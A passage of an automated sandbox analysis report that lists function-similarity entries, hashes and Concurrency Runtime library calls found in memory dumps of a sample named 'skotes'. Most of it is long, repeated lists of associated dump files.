                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 512098550-0
                                                                                                                                                                • Opcode ID: ff9de66d8cc43e6b86b139b2a9043d97d1abf4778bd23751400774ebbc5bc145
                                                                                                                                                                • Instruction ID: 98c148bc1c75cb43b64ad9974fb6deb7f59fc75039bb5881793f3593072b0b44
                                                                                                                                                                • Opcode Fuzzy Hash: ff9de66d8cc43e6b86b139b2a9043d97d1abf4778bd23751400774ebbc5bc145
                                                                                                                                                                • Instruction Fuzzy Hash: CC415E75A05219AFCB09EF68C454A6DB7F5FF49310F048199E516A7390DB34AE01CB80
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00BAD344
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAD367
                                                                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BAD370
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BAD3A8
                                                                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00BAD3B3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4212520697-0
                                                                                                                                                                • Opcode ID: 5e4031eaee5ff64f823bbecb33b183da81b99ddb5eeac37e51e507bd26b4b50f
                                                                                                                                                                • Instruction ID: 7103cfe16793612c06191ea351a8b1a64b9624894edb6afa83f28e5be8034567
                                                                                                                                                                • Opcode Fuzzy Hash: 5e4031eaee5ff64f823bbecb33b183da81b99ddb5eeac37e51e507bd26b4b50f
                                                                                                                                                                • Instruction Fuzzy Hash: C331BE79708210AFCB05EF54C884BADB7E6EF8A300F1401D9E8069B392DB70ED41CB96
                                                                                                                                                                APIs
                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 00BA86EE
                                                                                                                                                                  • Part of subcall function 00B9EAD0: _SpinWait.LIBCONCRT ref: 00B9EAE8
                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00BA8702
                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BA8734
                                                                                                                                                                • List.LIBCMT ref: 00BA87B7
                                                                                                                                                                • List.LIBCMT ref: 00BA87C6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                • Opcode ID: ec12fc16609afa9701f835992c6809c1f8f5c61a137e9d536363a3f8065491cb
                                                                                                                                                                • Instruction ID: 6fa47c9636fd2687d0da77aec0013a140cf7daf6583c44f10594ae2112980e3e
                                                                                                                                                                • Opcode Fuzzy Hash: ec12fc16609afa9701f835992c6809c1f8f5c61a137e9d536363a3f8065491cb
                                                                                                                                                                • Instruction Fuzzy Hash: AA314832909656DFCF14EFA4C5816EDB7F1BF06318F2400EAD4116BA52DB31AD04CBA5
                                                                                                                                                                APIs
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BB18A4
                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00BB18EB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pContext
                                                                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                                                                • Opcode ID: e6820383366d10246b2910ffb1d7ae5e863580ca0e787550c8fea779e38f122e
                                                                                                                                                                • Instruction ID: 49bb2372644714bff2a5b569eb05c050f46a4fb5246d6c9d44b9b9818399005e
                                                                                                                                                                • Opcode Fuzzy Hash: e6820383366d10246b2910ffb1d7ae5e863580ca0e787550c8fea779e38f122e
                                                                                                                                                                • Instruction Fuzzy Hash: 7A21E235B106159BCB14AB6CDCA5AFCB3E9FF94324B4409AAE411872D1DFE4A841CAD0
                                                                                                                                                                APIs
                                                                                                                                                                • List.LIBCONCRT ref: 00BAAEEA
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BAAF0F
                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00BAAF4E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
